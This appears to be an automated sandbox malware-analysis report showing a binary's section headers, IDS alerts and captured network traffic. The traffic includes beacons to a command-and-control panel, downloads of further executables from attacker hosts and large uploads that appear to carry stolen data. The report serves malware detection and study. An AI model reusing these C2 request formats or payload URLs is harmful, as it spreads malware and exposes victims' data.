00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 05 00 00 10 00 00 00 32 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 20 05 00 00 04 00 00 00 42 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 05 00 00 02 00 00 00 46 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 d0 2a 00 00 40 05 00 00 02 00 00 00 48 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 67 72 77 71 6f 73 66 00 70 1a 00 00 10 30 00 00 70 1a 00 00 4a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 61 70 6f 6d 72 6a 72 00 10 00 00 00 80 4a 00 00 04 00 00 00 ba 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 4a 00 00 22 00 00 00 be 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: gamertool.euContent-Length: 69Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: gamertool.euContent-Length: 69Expect: 100-continue
                        Source: global trafficHTTP traffic detected: GET /GmdDriver.exe HTTP/1.1Host: gamertool.eu
                        Source: global trafficHTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: gamertool.euContent-Length: 19Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 41 37 30 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32A70B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: GET /files/806475321/0tClIDb.exe HTTP/1.1Host: 31.41.244.11
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 32 32 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013229001&unit=246122658369
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 41 37 30 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32A70B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 41 37 30 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32A70B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 41 37 30 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32A70B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 41 37 30 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32A70B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 41 37 30 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32A70B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 41 37 30 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32A70B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 41 37 30 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32A70B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: Joe Sandbox ViewIP Address: 185.215.113.43 185.215.113.43
                        Source: Joe Sandbox ViewIP Address: 172.67.165.166 172.67.165.166
                        Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49765 -> 31.41.244.11:80
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49782 -> 172.67.165.166:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49788 -> 172.67.165.166:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49802 -> 172.67.165.166:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49795 -> 172.67.165.166:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49810 -> 172.67.165.166:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49819 -> 172.67.165.166:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49826 -> 172.67.165.166:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49834 -> 172.67.165.166:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49845 -> 104.21.9.168:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49886 -> 104.21.81.153:443
                        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49893 -> 104.21.81.153:443
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49868 -> 104.21.9.168:443
                        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz
                        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 48Host: atten-supporse.biz
                        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2IV6KEL089User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18116Host: atten-supporse.biz
                        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9L2NQWWVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8725Host: atten-supporse.biz
                        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PHSWT3AU2H4FCXW15YWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20444Host: atten-supporse.biz
                        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=50E65A1ZC8BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1216Host: atten-supporse.biz
                        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SCC5EPGZEJXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570532Host: atten-supporse.biz
                        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 83Host: atten-supporse.biz
                        Source: global trafficHTTP traffic detected: GET /LKSM.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: gamertool.eu
                        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: se-blurry.biz
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0049E0C0 recv,recv,recv,recv,0_2_0049E0C0
                        Source: global trafficHTTP traffic detected: GET /LKSM.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: gamertool.eu
                        Source: global trafficHTTP traffic detected: GET /GmdDriver.exe HTTP/1.1Host: gamertool.eu
                        Source: global trafficHTTP traffic detected: GET /files/806475321/0tClIDb.exe HTTP/1.1Host: 31.41.244.11
                        Source: global trafficDNS traffic detected: DNS query: atten-supporse.biz
                        Source: global trafficDNS traffic detected: DNS query: gamertool.eu
                        Source: global trafficDNS traffic detected: DNS query: impend-differ.biz
                        Source: global trafficDNS traffic detected: DNS query: se-blurry.biz
                        Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz
                        Source: skotes.exe, 00000006.00000002.2887135078.0000000001546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/
                        Source: skotes.exe, 00000006.00000002.2887135078.0000000001546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Local
                        Source: skotes.exe, 00000006.00000002.2887135078.0000000001576000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2887135078.00000000014F6000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2887135078.000000000151D000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2887135078.0000000001546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
                        Source: skotes.exe, 00000006.00000002.2887135078.0000000001546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php/
                        Source: skotes.exe, 00000006.00000002.2887135078.0000000001536000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php29001
                        Source: skotes.exe, 00000006.00000002.2887135078.0000000001536000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php3229001
                        Source: skotes.exe, 00000006.00000002.2887135078.0000000001546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpT
                        Source: skotes.exe, 00000006.00000002.2887135078.0000000001536000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpUsers
                        Source: skotes.exe, 00000006.00000002.2887135078.0000000001546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpV
                        Source: skotes.exe, 00000006.00000002.2887135078.0000000001546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpdedt
                        Source: skotes.exe, 00000006.00000002.2887135078.0000000001546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpg
                        Source: skotes.exe, 00000006.00000002.2887135078.0000000001546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
                        Source: skotes.exe, 00000006.00000002.2887135078.0000000001536000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpnu
                        Source: skotes.exe, 00000006.00000002.2887135078.0000000001546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/d
                        Source: skotes.exe, 00000006.00000002.2887135078.0000000001546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/ones
                        Source: skotes.exe, 00000006.00000002.2887135078.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2887135078.000000000151D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/806475321/0tClIDb.exe
                        Source: skotes.exe, 00000006.00000002.2887135078.00000000014F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/806475321/0tClIDb.exeRX
                        Source: skotes.exe, 00000006.00000002.2887135078.00000000014F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/806475321/0tClIDb.exeso~
                        Source: 0tClIDb.exe, 00000007.00000003.2540607901.00000000058C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                        Source: 0tClIDb.exe, 00000007.00000003.2540607901.00000000058C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                        Source: 184f72cd859c47b29124ab7c76766326.exe, 0000000D.00000003.2836534642.0000000001495000.00000004.00000020.00020000.00000000.sdmp, 184f72cd859c47b29124ab7c76766326.exe, 0000000D.00000003.2836770077.00000000014DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                        Source: 0tClIDb.exe, 00000007.00000003.2540607901.00000000058C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                        Source: 0tClIDb.exe, 00000007.00000003.2540607901.00000000058C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                        Source: 0tClIDb.exe, 00000007.00000003.2540607901.00000000058C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                        Source: 0tClIDb.exe, 00000007.00000003.2540607901.00000000058C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                        Source: 0tClIDb.exe, 00000007.00000003.2540607901.00000000058C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                        Source: 0tClIDb.exe, 00000007.00000003.2540607901.00000000058C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                        Source: 0tClIDb.exe, 00000007.00000003.2540607901.00000000058C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                        Source: NvidiaDriver.exe, 0000000A.00000002.2886812760.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
